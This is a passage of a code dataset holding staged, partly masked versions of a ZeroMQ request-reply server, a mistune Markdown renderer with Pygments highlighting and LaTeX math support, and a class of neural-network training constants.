"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import time  # stdlib sleep used to pace request handling
import zmq  # ZeroMQ messaging library
context = zmq.Context()  # one ZeroMQ context per process
socket = context.socket(zmq.REP)  # REP (reply) socket: strict recv/send alternation
socket.bind("tcp://10.20.32.221:5555")  # listen on TCP port 5555 of this address
while True:  # serve requests forever
    message = socket.recv()  # block until a client request arrives
    print("Received request: %s" % message)  # log the raw request bytes
    # do some work
    time.sleep(1)  # simulate one second of processing per request
    socket.send(b"World")  # a REP socket must reply before the next recv
|
normal
|
{
"blob_id": "ccba923fa4b07ca9c87c57797e1e6c7da3a71183",
"index": 4315,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsocket.bind('tcp://10.20.32.221:5555')\nwhile True:\n message = socket.recv()\n print('Received request: %s' % message)\n time.sleep(1)\n socket.send(b'World')\n",
"step-3": "<mask token>\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind('tcp://10.20.32.221:5555')\nwhile True:\n message = socket.recv()\n print('Received request: %s' % message)\n time.sleep(1)\n socket.send(b'World')\n",
"step-4": "import time\nimport zmq\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind('tcp://10.20.32.221:5555')\nwhile True:\n message = socket.recv()\n print('Received request: %s' % message)\n time.sleep(1)\n socket.send(b'World')\n",
"step-5": "import time #melakukan import library time\nimport zmq #melakukan import library ZeroMQ\n\ncontext = zmq.Context() #melakukan inisialisasi context ZeroMQ pada variable context \nsocket = context.socket(zmq.REP) #menginisialisasikan socket(Reply) pada variable context(ZeroMQ)\nsocket.bind(\"tcp://10.20.32.221:5555\") #melakukan binding socket dengan port tcp 5555\n\nwhile True: #Looping selama kondisi benar\n\n message = socket.recv() #menampung pesan yang diterima oleh socket ke dalam variable message\n print(\"Received request: %s\" % message) #melakukan output dari message yang diterima\n\n\t# do some work\n time.sleep(1) #waktu interval untuk istirahat/melakukan proses berikutnya\n\n\n socket.send(b\"World\") #mengirim suatu pesan berupa bit pesan ('world') ke dalam socket\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MathBlockLexer(mistune.BlockLexer):
<|reserved_special_token_0|>
def __init__(self, rules=None, **kwargs):
if rules is None:
rules = MathBlockGrammar()
super(MathBlockLexer, self).__init__(rules, **kwargs)
def parse_block_math(self, m):
"""Parse a $$math$$ block"""
self.tokens.append({'type': 'block_math', 'text': m.group(1)})
def parse_latex_environment(self, m):
self.tokens.append({'type': 'latex_environment', 'name': m.group(1),
'text': m.group(2)})
class MathInlineGrammar(mistune.InlineGrammar):
math = re.compile('^\\$(.+?)\\$', re.DOTALL)
block_math = re.compile('^\\$\\$(.+?)\\$\\$', re.DOTALL)
text = re.compile('^[\\s\\S]+?(?=[\\\\<!\\[_*`~$]|https?://| {2,}\\n|$)')
class MathInlineLexer(mistune.InlineLexer):
default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules
def __init__(self, renderer, rules=None, **kwargs):
if rules is None:
rules = MathInlineGrammar()
super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)
def output_math(self, m):
return self.renderer.inline_math(m.group(1))
def output_block_math(self, m):
return self.renderer.block_math(m.group(1))
class MarkdownWithMath(mistune.Markdown):
def __init__(self, renderer, **kwargs):
if 'inline' not in kwargs:
kwargs['inline'] = MathInlineLexer
if 'block' not in kwargs:
kwargs['block'] = MathBlockLexer
super(MarkdownWithMath, self).__init__(renderer, **kwargs)
def output_block_math(self):
return self.renderer.block_math(self.token['text'])
def output_latex_environment(self):
return self.renderer.latex_environment(self.token['name'], self.
token['text'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MathBlockGrammar(mistune.BlockGrammar):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class MathBlockLexer(mistune.BlockLexer):
default_rules = ['block_math', 'latex_environment'
] + mistune.BlockLexer.default_rules
def __init__(self, rules=None, **kwargs):
if rules is None:
rules = MathBlockGrammar()
super(MathBlockLexer, self).__init__(rules, **kwargs)
def parse_block_math(self, m):
"""Parse a $$math$$ block"""
self.tokens.append({'type': 'block_math', 'text': m.group(1)})
def parse_latex_environment(self, m):
self.tokens.append({'type': 'latex_environment', 'name': m.group(1),
'text': m.group(2)})
class MathInlineGrammar(mistune.InlineGrammar):
math = re.compile('^\\$(.+?)\\$', re.DOTALL)
block_math = re.compile('^\\$\\$(.+?)\\$\\$', re.DOTALL)
text = re.compile('^[\\s\\S]+?(?=[\\\\<!\\[_*`~$]|https?://| {2,}\\n|$)')
class MathInlineLexer(mistune.InlineLexer):
default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules
def __init__(self, renderer, rules=None, **kwargs):
if rules is None:
rules = MathInlineGrammar()
super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)
def output_math(self, m):
return self.renderer.inline_math(m.group(1))
def output_block_math(self, m):
return self.renderer.block_math(m.group(1))
class MarkdownWithMath(mistune.Markdown):
def __init__(self, renderer, **kwargs):
if 'inline' not in kwargs:
kwargs['inline'] = MathInlineLexer
if 'block' not in kwargs:
kwargs['block'] = MathBlockLexer
super(MarkdownWithMath, self).__init__(renderer, **kwargs)
def output_block_math(self):
return self.renderer.block_math(self.token['text'])
def output_latex_environment(self):
return self.renderer.latex_environment(self.token['name'], self.
token['text'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class HighlightRenderer(mistune.Renderer):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class MathBlockGrammar(mistune.BlockGrammar):
block_math = re.compile('^\\$\\$(.*?)\\$\\$', re.DOTALL)
latex_environment = re.compile(
'^\\\\begin\\{([a-z]*\\*?)\\}(.*?)\\\\end\\{\\1\\}', re.DOTALL)
class MathBlockLexer(mistune.BlockLexer):
default_rules = ['block_math', 'latex_environment'
] + mistune.BlockLexer.default_rules
def __init__(self, rules=None, **kwargs):
if rules is None:
rules = MathBlockGrammar()
super(MathBlockLexer, self).__init__(rules, **kwargs)
def parse_block_math(self, m):
"""Parse a $$math$$ block"""
self.tokens.append({'type': 'block_math', 'text': m.group(1)})
def parse_latex_environment(self, m):
self.tokens.append({'type': 'latex_environment', 'name': m.group(1),
'text': m.group(2)})
class MathInlineGrammar(mistune.InlineGrammar):
math = re.compile('^\\$(.+?)\\$', re.DOTALL)
block_math = re.compile('^\\$\\$(.+?)\\$\\$', re.DOTALL)
text = re.compile('^[\\s\\S]+?(?=[\\\\<!\\[_*`~$]|https?://| {2,}\\n|$)')
class MathInlineLexer(mistune.InlineLexer):
default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules
def __init__(self, renderer, rules=None, **kwargs):
if rules is None:
rules = MathInlineGrammar()
super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)
def output_math(self, m):
return self.renderer.inline_math(m.group(1))
def output_block_math(self, m):
return self.renderer.block_math(m.group(1))
class MarkdownWithMath(mistune.Markdown):
def __init__(self, renderer, **kwargs):
if 'inline' not in kwargs:
kwargs['inline'] = MathInlineLexer
if 'block' not in kwargs:
kwargs['block'] = MathBlockLexer
super(MarkdownWithMath, self).__init__(renderer, **kwargs)
def output_block_math(self):
return self.renderer.block_math(self.token['text'])
def output_latex_environment(self):
return self.renderer.latex_environment(self.token['name'], self.
token['text'])
<|reserved_special_token_1|>
import re
import mistune
import pygments
from pygments.lexers import get_lexer_by_name
from pygments.formatters import html
class HighlightRenderer(mistune.Renderer):
    """Mistune renderer that highlights fenced code with Pygments and
    passes TeX math through verbatim for client-side (MathJax) rendering."""

    def block_code(self, code, lang):
        """Render a fenced code block, syntax-highlighted when possible.

        Falls back to a plain HTML-escaped ``<pre><code>`` block when no
        language is given or Pygments does not recognize the language name.
        """
        plain = '\n<pre><code>%s</code></pre>\n'
        if not lang:
            return plain % mistune.escape(code)
        try:
            lexer = get_lexer_by_name(lang, stripall=True)
        except pygments.util.ClassNotFound:
            # Unknown language tag: degrade gracefully to an escaped block.
            return plain % mistune.escape(code)
        return pygments.highlight(code, lexer, html.HtmlFormatter())

    def block_math(self, text):
        """Emit display math unchanged, wrapped in ``$$...$$``."""
        return '$$' + text + '$$'

    def latex_environment(self, name, text):
        """Emit a ``\\begin{name}...\\end{name}`` environment unchanged."""
        return '\\begin{' + name + '}' + text + '\\end{' + name + '}'

    def inline_math(self, text):
        """Emit inline math unchanged, wrapped in ``$...$``."""
        return '$' + text + '$'
class MathBlockGrammar(mistune.BlockGrammar):
    """Block-level grammar extended with display math and LaTeX environments."""

    # $$ ... $$ spanning any number of lines.
    block_math = re.compile(r'^\$\$(.*?)\$\$', re.DOTALL)
    # \begin{env} ... \end{env}; the backreference \1 forces matching names.
    latex_environment = re.compile(
        r'^\\begin\{([a-z]*\*?)\}(.*?)\\end\{\1\}', re.DOTALL)
class MathBlockLexer(mistune.BlockLexer):
    """Block lexer that tries the math rules ahead of the stock rules."""

    default_rules = ['block_math', 'latex_environment'
        ] + mistune.BlockLexer.default_rules

    def __init__(self, rules=None, **kwargs):
        if rules is None:
            rules = MathBlockGrammar()
        super(MathBlockLexer, self).__init__(rules, **kwargs)

    def parse_block_math(self, match):
        """Queue a token for a ``$$math$$`` block."""
        token = {'type': 'block_math', 'text': match.group(1)}
        self.tokens.append(token)

    def parse_latex_environment(self, match):
        """Queue a token for a ``\\begin{...}...\\end{...}`` block."""
        token = {'type': 'latex_environment',
                 'name': match.group(1),
                 'text': match.group(2)}
        self.tokens.append(token)
class MathInlineGrammar(mistune.InlineGrammar):
    """Inline grammar that adds ``$math$`` and ``$$math$$`` spans."""

    math = re.compile(r'^\$(.+?)\$', re.DOTALL)
    block_math = re.compile(r'^\$\$(.+?)\$\$', re.DOTALL)
    # Override 'text' so plain text also stops at '$', letting math match.
    text = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~$]|https?://| {2,}\n|$)')
class MathInlineLexer(mistune.InlineLexer):
    """Inline lexer that gives the math rules priority over the defaults."""

    default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules

    def __init__(self, renderer, rules=None, **kwargs):
        if rules is None:
            rules = MathInlineGrammar()
        super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)

    def output_math(self, match):
        """Render an inline ``$...$`` span."""
        return self.renderer.inline_math(match.group(1))

    def output_block_math(self, match):
        """Render a ``$$...$$`` span encountered in inline context."""
        return self.renderer.block_math(match.group(1))
class MarkdownWithMath(mistune.Markdown):
    """Markdown parser preconfigured with the math-aware lexers."""

    def __init__(self, renderer, **kwargs):
        # Install the math lexers only when the caller did not supply any.
        kwargs.setdefault('inline', MathInlineLexer)
        kwargs.setdefault('block', MathBlockLexer)
        super(MarkdownWithMath, self).__init__(renderer, **kwargs)

    def output_block_math(self):
        """Render the pending display-math token."""
        return self.renderer.block_math(self.token['text'])

    def output_latex_environment(self):
        """Render the pending LaTeX-environment token."""
        token = self.token
        return self.renderer.latex_environment(token['name'], token['text'])
<|reserved_special_token_1|>
# DISCLAIMER
# The "Math" code was taken from http://depado.markdownblog.com/2015-09-29-mistune-parser-syntax-highlighter-mathjax-support-and-centered-images
# The HighlightRenderer code was taken from https://github.com/rupeshk/MarkdownHighlighter
# MarkdownHighlighter is a simple syntax highlighter for Markdown syntax.
# The initial code for MarkdownHighlighter was taken from niwmarkdowneditor by John Schember
# Copyright 2009 John Schember, Copyright 2012 Rupesh Kumar
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
import re
import mistune
import pygments
from pygments.lexers import get_lexer_by_name
from pygments.formatters import html
class HighlightRenderer(mistune.Renderer):
    """Mistune renderer: Pygments highlighting for code blocks, math passed
    through verbatim so MathJax can render it in the browser."""
    def block_code(self, code, lang):
        """Render a fenced code block.

        Highlights with Pygments when *lang* names a known lexer;
        otherwise returns a plain HTML-escaped ``<pre><code>`` block.
        """
        if not lang:
            return '\n<pre><code>%s</code></pre>\n' % \
                mistune.escape(code)
        try:
            lexer = get_lexer_by_name(lang, stripall=True)
        except pygments.util.ClassNotFound:
            # Unrecognized language name: fall back to an escaped block.
            return '\n<pre><code>%s</code></pre>\n' % \
                mistune.escape(code)
        formatter = html.HtmlFormatter()
        return pygments.highlight(code, lexer, formatter)
    # Pass math through unaltered - mathjax does the rendering in the browser
    def block_math(self, text):
        """Return display math wrapped in ``$$...$$``."""
        return '$$%s$$' % text
    def latex_environment(self, name, text):
        """Return a LaTeX ``\\begin{name}...\\end{name}`` environment."""
        return r'\begin{%s}%s\end{%s}' % (name, text, name)
    def inline_math(self, text):
        """Return inline math wrapped in ``$...$``."""
        return '$%s$' % text
class MathBlockGrammar(mistune.BlockGrammar):
    """Block grammar with two extra rules: $$...$$ math and LaTeX environments."""
    # Multi-line display math delimited by $$ ... $$.
    block_math = re.compile(r"^\$\$(.*?)\$\$", re.DOTALL)
    # \begin{env}...\end{env}; the backreference \1 forces matching names.
    latex_environment = re.compile(
        r"^\\begin\{([a-z]*\*?)\}(.*?)\\end\{\1\}", re.DOTALL)
class MathBlockLexer(mistune.BlockLexer):
    """Block lexer that checks the math rules before the default rules."""
    # Math rules first so they take precedence over paragraph matching.
    default_rules = [
        'block_math', 'latex_environment'] + mistune.BlockLexer.default_rules
    def __init__(self, rules=None, **kwargs):
        """Use :class:`MathBlockGrammar` unless an explicit grammar is given."""
        if rules is None:
            rules = MathBlockGrammar()
        super(MathBlockLexer, self).__init__(rules, **kwargs)
    def parse_block_math(self, m):
        """Parse a $$math$$ block"""
        self.tokens.append({
            'type': 'block_math',
            'text': m.group(1)
        })
    def parse_latex_environment(self, m):
        """Queue a token for a matched ``\\begin{...}...\\end{...}`` block."""
        self.tokens.append({
            'type': 'latex_environment',
            'name': m.group(1),
            'text': m.group(2)
        })
class MathInlineGrammar(mistune.InlineGrammar):
    """Inline grammar that adds $math$ and $$math$$ spans."""
    math = re.compile(r"^\$(.+?)\$", re.DOTALL)
    block_math = re.compile(r"^\$\$(.+?)\$\$", re.DOTALL)
    # 'text' is overridden to also stop at '$' so the math rules can fire.
    text = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~$]|https?://| {2,}\n|$)')
class MathInlineLexer(mistune.InlineLexer):
    """Inline lexer that gives the math rules priority over the defaults."""
    default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules
    def __init__(self, renderer, rules=None, **kwargs):
        """Use :class:`MathInlineGrammar` unless an explicit grammar is given."""
        if rules is None:
            rules = MathInlineGrammar()
        super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)
    def output_math(self, m):
        """Render an inline ``$...$`` span."""
        return self.renderer.inline_math(m.group(1))
    def output_block_math(self, m):
        """Render a ``$$...$$`` span encountered in inline context."""
        return self.renderer.block_math(m.group(1))
class MarkdownWithMath(mistune.Markdown):
    """Markdown parser wired with the math-aware inline and block lexers."""
    def __init__(self, renderer, **kwargs):
        # Install the math lexers only when the caller did not supply any.
        if 'inline' not in kwargs:
            kwargs['inline'] = MathInlineLexer
        if 'block' not in kwargs:
            kwargs['block'] = MathBlockLexer
        super(MarkdownWithMath, self).__init__(renderer, **kwargs)
    def output_block_math(self):
        """Render the current display-math token."""
        return self.renderer.block_math(self.token['text'])
    def output_latex_environment(self):
        """Render the current LaTeX-environment token."""
        return self.renderer.latex_environment(self.token['name'],
                                               self.token['text'])
|
flexible
|
{
"blob_id": "a6c45ab3df0a692cd625d8203e1152e942a4cd6c",
"index": 5908,
"step-1": "<mask token>\n\n\nclass MathBlockLexer(mistune.BlockLexer):\n <mask token>\n\n def __init__(self, rules=None, **kwargs):\n if rules is None:\n rules = MathBlockGrammar()\n super(MathBlockLexer, self).__init__(rules, **kwargs)\n\n def parse_block_math(self, m):\n \"\"\"Parse a $$math$$ block\"\"\"\n self.tokens.append({'type': 'block_math', 'text': m.group(1)})\n\n def parse_latex_environment(self, m):\n self.tokens.append({'type': 'latex_environment', 'name': m.group(1),\n 'text': m.group(2)})\n\n\nclass MathInlineGrammar(mistune.InlineGrammar):\n math = re.compile('^\\\\$(.+?)\\\\$', re.DOTALL)\n block_math = re.compile('^\\\\$\\\\$(.+?)\\\\$\\\\$', re.DOTALL)\n text = re.compile('^[\\\\s\\\\S]+?(?=[\\\\\\\\<!\\\\[_*`~$]|https?://| {2,}\\\\n|$)')\n\n\nclass MathInlineLexer(mistune.InlineLexer):\n default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules\n\n def __init__(self, renderer, rules=None, **kwargs):\n if rules is None:\n rules = MathInlineGrammar()\n super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)\n\n def output_math(self, m):\n return self.renderer.inline_math(m.group(1))\n\n def output_block_math(self, m):\n return self.renderer.block_math(m.group(1))\n\n\nclass MarkdownWithMath(mistune.Markdown):\n\n def __init__(self, renderer, **kwargs):\n if 'inline' not in kwargs:\n kwargs['inline'] = MathInlineLexer\n if 'block' not in kwargs:\n kwargs['block'] = MathBlockLexer\n super(MarkdownWithMath, self).__init__(renderer, **kwargs)\n\n def output_block_math(self):\n return self.renderer.block_math(self.token['text'])\n\n def output_latex_environment(self):\n return self.renderer.latex_environment(self.token['name'], self.\n token['text'])\n",
"step-2": "<mask token>\n\n\nclass MathBlockGrammar(mistune.BlockGrammar):\n <mask token>\n <mask token>\n\n\nclass MathBlockLexer(mistune.BlockLexer):\n default_rules = ['block_math', 'latex_environment'\n ] + mistune.BlockLexer.default_rules\n\n def __init__(self, rules=None, **kwargs):\n if rules is None:\n rules = MathBlockGrammar()\n super(MathBlockLexer, self).__init__(rules, **kwargs)\n\n def parse_block_math(self, m):\n \"\"\"Parse a $$math$$ block\"\"\"\n self.tokens.append({'type': 'block_math', 'text': m.group(1)})\n\n def parse_latex_environment(self, m):\n self.tokens.append({'type': 'latex_environment', 'name': m.group(1),\n 'text': m.group(2)})\n\n\nclass MathInlineGrammar(mistune.InlineGrammar):\n math = re.compile('^\\\\$(.+?)\\\\$', re.DOTALL)\n block_math = re.compile('^\\\\$\\\\$(.+?)\\\\$\\\\$', re.DOTALL)\n text = re.compile('^[\\\\s\\\\S]+?(?=[\\\\\\\\<!\\\\[_*`~$]|https?://| {2,}\\\\n|$)')\n\n\nclass MathInlineLexer(mistune.InlineLexer):\n default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules\n\n def __init__(self, renderer, rules=None, **kwargs):\n if rules is None:\n rules = MathInlineGrammar()\n super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)\n\n def output_math(self, m):\n return self.renderer.inline_math(m.group(1))\n\n def output_block_math(self, m):\n return self.renderer.block_math(m.group(1))\n\n\nclass MarkdownWithMath(mistune.Markdown):\n\n def __init__(self, renderer, **kwargs):\n if 'inline' not in kwargs:\n kwargs['inline'] = MathInlineLexer\n if 'block' not in kwargs:\n kwargs['block'] = MathBlockLexer\n super(MarkdownWithMath, self).__init__(renderer, **kwargs)\n\n def output_block_math(self):\n return self.renderer.block_math(self.token['text'])\n\n def output_latex_environment(self):\n return self.renderer.latex_environment(self.token['name'], self.\n token['text'])\n",
"step-3": "<mask token>\n\n\nclass HighlightRenderer(mistune.Renderer):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MathBlockGrammar(mistune.BlockGrammar):\n block_math = re.compile('^\\\\$\\\\$(.*?)\\\\$\\\\$', re.DOTALL)\n latex_environment = re.compile(\n '^\\\\\\\\begin\\\\{([a-z]*\\\\*?)\\\\}(.*?)\\\\\\\\end\\\\{\\\\1\\\\}', re.DOTALL)\n\n\nclass MathBlockLexer(mistune.BlockLexer):\n default_rules = ['block_math', 'latex_environment'\n ] + mistune.BlockLexer.default_rules\n\n def __init__(self, rules=None, **kwargs):\n if rules is None:\n rules = MathBlockGrammar()\n super(MathBlockLexer, self).__init__(rules, **kwargs)\n\n def parse_block_math(self, m):\n \"\"\"Parse a $$math$$ block\"\"\"\n self.tokens.append({'type': 'block_math', 'text': m.group(1)})\n\n def parse_latex_environment(self, m):\n self.tokens.append({'type': 'latex_environment', 'name': m.group(1),\n 'text': m.group(2)})\n\n\nclass MathInlineGrammar(mistune.InlineGrammar):\n math = re.compile('^\\\\$(.+?)\\\\$', re.DOTALL)\n block_math = re.compile('^\\\\$\\\\$(.+?)\\\\$\\\\$', re.DOTALL)\n text = re.compile('^[\\\\s\\\\S]+?(?=[\\\\\\\\<!\\\\[_*`~$]|https?://| {2,}\\\\n|$)')\n\n\nclass MathInlineLexer(mistune.InlineLexer):\n default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules\n\n def __init__(self, renderer, rules=None, **kwargs):\n if rules is None:\n rules = MathInlineGrammar()\n super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)\n\n def output_math(self, m):\n return self.renderer.inline_math(m.group(1))\n\n def output_block_math(self, m):\n return self.renderer.block_math(m.group(1))\n\n\nclass MarkdownWithMath(mistune.Markdown):\n\n def __init__(self, renderer, **kwargs):\n if 'inline' not in kwargs:\n kwargs['inline'] = MathInlineLexer\n if 'block' not in kwargs:\n kwargs['block'] = MathBlockLexer\n super(MarkdownWithMath, self).__init__(renderer, **kwargs)\n\n def output_block_math(self):\n return 
self.renderer.block_math(self.token['text'])\n\n def output_latex_environment(self):\n return self.renderer.latex_environment(self.token['name'], self.\n token['text'])\n",
"step-4": "import re\nimport mistune\nimport pygments\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters import html\n\n\nclass HighlightRenderer(mistune.Renderer):\n\n def block_code(self, code, lang):\n if not lang:\n return '\\n<pre><code>%s</code></pre>\\n' % mistune.escape(code)\n try:\n lexer = get_lexer_by_name(lang, stripall=True)\n except pygments.util.ClassNotFound:\n return '\\n<pre><code>%s</code></pre>\\n' % mistune.escape(code)\n formatter = html.HtmlFormatter()\n return pygments.highlight(code, lexer, formatter)\n\n def block_math(self, text):\n return '$$%s$$' % text\n\n def latex_environment(self, name, text):\n return '\\\\begin{%s}%s\\\\end{%s}' % (name, text, name)\n\n def inline_math(self, text):\n return '$%s$' % text\n\n\nclass MathBlockGrammar(mistune.BlockGrammar):\n block_math = re.compile('^\\\\$\\\\$(.*?)\\\\$\\\\$', re.DOTALL)\n latex_environment = re.compile(\n '^\\\\\\\\begin\\\\{([a-z]*\\\\*?)\\\\}(.*?)\\\\\\\\end\\\\{\\\\1\\\\}', re.DOTALL)\n\n\nclass MathBlockLexer(mistune.BlockLexer):\n default_rules = ['block_math', 'latex_environment'\n ] + mistune.BlockLexer.default_rules\n\n def __init__(self, rules=None, **kwargs):\n if rules is None:\n rules = MathBlockGrammar()\n super(MathBlockLexer, self).__init__(rules, **kwargs)\n\n def parse_block_math(self, m):\n \"\"\"Parse a $$math$$ block\"\"\"\n self.tokens.append({'type': 'block_math', 'text': m.group(1)})\n\n def parse_latex_environment(self, m):\n self.tokens.append({'type': 'latex_environment', 'name': m.group(1),\n 'text': m.group(2)})\n\n\nclass MathInlineGrammar(mistune.InlineGrammar):\n math = re.compile('^\\\\$(.+?)\\\\$', re.DOTALL)\n block_math = re.compile('^\\\\$\\\\$(.+?)\\\\$\\\\$', re.DOTALL)\n text = re.compile('^[\\\\s\\\\S]+?(?=[\\\\\\\\<!\\\\[_*`~$]|https?://| {2,}\\\\n|$)')\n\n\nclass MathInlineLexer(mistune.InlineLexer):\n default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules\n\n def __init__(self, renderer, 
rules=None, **kwargs):\n if rules is None:\n rules = MathInlineGrammar()\n super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)\n\n def output_math(self, m):\n return self.renderer.inline_math(m.group(1))\n\n def output_block_math(self, m):\n return self.renderer.block_math(m.group(1))\n\n\nclass MarkdownWithMath(mistune.Markdown):\n\n def __init__(self, renderer, **kwargs):\n if 'inline' not in kwargs:\n kwargs['inline'] = MathInlineLexer\n if 'block' not in kwargs:\n kwargs['block'] = MathBlockLexer\n super(MarkdownWithMath, self).__init__(renderer, **kwargs)\n\n def output_block_math(self):\n return self.renderer.block_math(self.token['text'])\n\n def output_latex_environment(self):\n return self.renderer.latex_environment(self.token['name'], self.\n token['text'])\n",
"step-5": "# DISCLAIMER\n# The \"Math\" code was taken from http://depado.markdownblog.com/2015-09-29-mistune-parser-syntax-highlighter-mathjax-support-and-centered-images\n# The HighlightRenderer code was taken from https://github.com/rupeshk/MarkdownHighlighter\n\n\n# MarkdownHighlighter is a simple syntax highlighter for Markdown syntax.\n# The initial code for MarkdownHighlighter was taken from niwmarkdowneditor by John Schember\n# Copyright 2009 John Schember, Copyright 2012 Rupesh Kumar\n\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n\n\nimport re\nimport mistune\nimport pygments\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters import html\n\n\nclass HighlightRenderer(mistune.Renderer):\n\n def block_code(self, code, lang):\n if not lang:\n return '\\n<pre><code>%s</code></pre>\\n' % \\\n mistune.escape(code)\n try:\n lexer = get_lexer_by_name(lang, stripall=True)\n except pygments.util.ClassNotFound:\n return '\\n<pre><code>%s</code></pre>\\n' % \\\n mistune.escape(code)\n\n formatter = html.HtmlFormatter()\n return pygments.highlight(code, lexer, formatter)\n\n # Pass math through unaltered - mathjax does the rendering in the browser\n def block_math(self, text):\n return '$$%s$$' % text\n\n def latex_environment(self, name, text):\n return r'\\begin{%s}%s\\end{%s}' % 
(name, text, name)\n\n def inline_math(self, text):\n return '$%s$' % text\n\n\nclass MathBlockGrammar(mistune.BlockGrammar):\n block_math = re.compile(r\"^\\$\\$(.*?)\\$\\$\", re.DOTALL)\n latex_environment = re.compile(\n r\"^\\\\begin\\{([a-z]*\\*?)\\}(.*?)\\\\end\\{\\1\\}\", re.DOTALL)\n\n\nclass MathBlockLexer(mistune.BlockLexer):\n default_rules = [\n 'block_math', 'latex_environment'] + mistune.BlockLexer.default_rules\n\n def __init__(self, rules=None, **kwargs):\n if rules is None:\n rules = MathBlockGrammar()\n super(MathBlockLexer, self).__init__(rules, **kwargs)\n\n def parse_block_math(self, m):\n \"\"\"Parse a $$math$$ block\"\"\"\n self.tokens.append({\n 'type': 'block_math',\n 'text': m.group(1)\n })\n\n def parse_latex_environment(self, m):\n self.tokens.append({\n 'type': 'latex_environment',\n 'name': m.group(1),\n 'text': m.group(2)\n })\n\n\nclass MathInlineGrammar(mistune.InlineGrammar):\n math = re.compile(r\"^\\$(.+?)\\$\", re.DOTALL)\n block_math = re.compile(r\"^\\$\\$(.+?)\\$\\$\", re.DOTALL)\n text = re.compile(r'^[\\s\\S]+?(?=[\\\\<!\\[_*`~$]|https?://| {2,}\\n|$)')\n\n\nclass MathInlineLexer(mistune.InlineLexer):\n default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules\n\n def __init__(self, renderer, rules=None, **kwargs):\n if rules is None:\n rules = MathInlineGrammar()\n super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)\n\n def output_math(self, m):\n return self.renderer.inline_math(m.group(1))\n\n def output_block_math(self, m):\n return self.renderer.block_math(m.group(1))\n\n\nclass MarkdownWithMath(mistune.Markdown):\n def __init__(self, renderer, **kwargs):\n if 'inline' not in kwargs:\n kwargs['inline'] = MathInlineLexer\n if 'block' not in kwargs:\n kwargs['block'] = MathBlockLexer\n super(MarkdownWithMath, self).__init__(renderer, **kwargs)\n\n def output_block_math(self):\n return self.renderer.block_math(self.token['text'])\n\n def output_latex_environment(self):\n return 
self.renderer.latex_environment(self.token['name'],\n self.token['text'])\n",
"step-ids": [
15,
17,
19,
24,
25
]
}
|
[
15,
17,
19,
24,
25
] |
import numpy as np
class Constants:
    """Default hyperparameters for DNN training runs."""

    # Architecture / regularization defaults.
    DNN_DEFAULT_ACTIVATION = 'relu'
    DNN_DEFAULT_KERNEL_REGULARIZATION = [0, 5e-05]
    DNN_DEFAULT_BIAS_REGULARIZATION = [0, 5e-05]
    DNN_DEFAULT_DROPOUT_RATE = 0.02
    DNN_DEFAULT_BIAS = 0.1
    DNN_DEFAULT_OUTPUT_BIAS = 0.5

    # Optimization defaults.
    DNN_DEFAULT_LOSS = 'mean_squared_error'
    DNN_DEFAULT_OPTIMIZER = 'adam'
    DNN_DEFAULT_DECAY = 0
    DNN_DEFAULT_BATCH_SIZE = 16
    DNN_DEFAULT_EPOCHS = 100

    # Validation / checkpointing cadence.
    DNN_DEFAULT_VALIDATION_SPLIT = 0.2
    DNN_DEFAULT_VALIDATION_PERIOD = 1
    DNN_DEFAULT_CHECKPOINT_PERIOD = 100
    DNN_DEFAULT_PATIENCE = 1000
|
normal
|
{
"blob_id": "b2bb7393bf7955f5de30c59364b495b8f888e178",
"index": 4073,
"step-1": "<mask token>\n",
